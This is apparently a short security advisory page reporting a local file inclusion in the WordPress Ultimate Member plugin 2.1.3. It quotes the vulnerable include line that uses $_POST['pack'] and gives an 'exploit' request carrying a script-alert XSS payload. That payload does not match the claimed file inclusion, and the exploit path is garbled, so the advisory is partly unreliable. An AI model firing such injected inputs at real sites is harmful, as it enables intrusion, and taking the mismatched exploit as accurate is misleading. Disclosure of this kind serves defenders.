WordPress Ultimate-Member 2.1.3 Local File Inclusion

2020.02.14
Credit: Mehran Feizi
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

[-] Title : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion [-] Author : mehran feizi [-] Category : Webapps [-] Date : 2020-02-11 [-] vendor home page: https://wordpress.org/plugins/ultimate-member/ Vulnerable Page: /class-admin-upgrade.php Vulnerable Source: 354: if(empty($_POST['pack'])) else 356: include_once include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php'; Exploit: localhost/wp-content/plugins/worprees plugin bug dar/ultimate-member/includes/admin/core/class-admin-upgrade.php $_POST('pack')=<script>alert('xss')</script>


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top